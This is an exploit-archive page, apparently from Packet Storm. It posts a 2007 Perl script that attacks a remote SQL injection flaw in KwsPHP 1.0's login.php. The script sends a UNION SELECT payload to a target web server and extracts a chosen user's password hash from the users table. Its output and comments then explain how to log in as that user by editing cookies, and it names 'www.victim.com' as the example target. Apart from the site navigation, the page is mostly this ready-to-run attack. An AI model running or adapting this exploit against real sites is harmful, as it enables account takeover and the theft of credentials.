exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

kwslogin-sql.txt

kwslogin-sql.txt
Posted Sep 18, 2007
Authored by S4mi

KwsPHP version 1.0 suffers from a remote SQL injection vulnerability in login.php.

tags | exploit, remote, php, sql injection
SHA-256 | 12dabbee357fe8b53e8436376d23806c819921fbd89083836bec35ec01058bdd

kwslogin-sql.txt

Change Mirror Download
###################################################
# Script..........................: KwsPHP ver 1.0
# Script Site..................: http://kws.koogar.org/
# Vulnerability...............: login.php Remote SQL injection Exploit
# Access.........................: Remote
# level.............................: Dangerous
# Author..........................: S4mi
# Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
#
####################################################
# This Exploit work Only When magic_quotes_gpc Is OFF
#
#Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
# + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
###################################################

#!/usr/bin/perl

use IO::Socket ;

&header();

&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));

$host = $ARGV[0];
$path = $ARGV[1];
$user = $ARGV[2];


syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

$inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer";

syswrite STDOUT ,"\n Sending Data ...";

print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";

syswrite STDOUT ,"[OK]\n\n";

while($answer = <$sock>){

if ($answer =~ /class="messagelogin">(.*?) /){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ----------------------- +\n";
print "+ Username: $user\n";
print "+ Password: $1\n";
print "+ -------Have Fun--------- +\n";
print "+ You don't need to crack the hash password :D\n";
print "+ Just login with ur owen information and edit the cookies\n";
}
}

sub usage{
print "\nUsage : perl $0 host /path/ UserName ";
print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n";
exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script......................: KwsPHP ver 1.0
# Script Site.................: http://kws.koogar.org/
# Vulnerability...............: Remote SQL injection Exploit
# Access......................: Remote
# level.......................: Dangerous
# Author......................: S4mi
# Contact.....................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close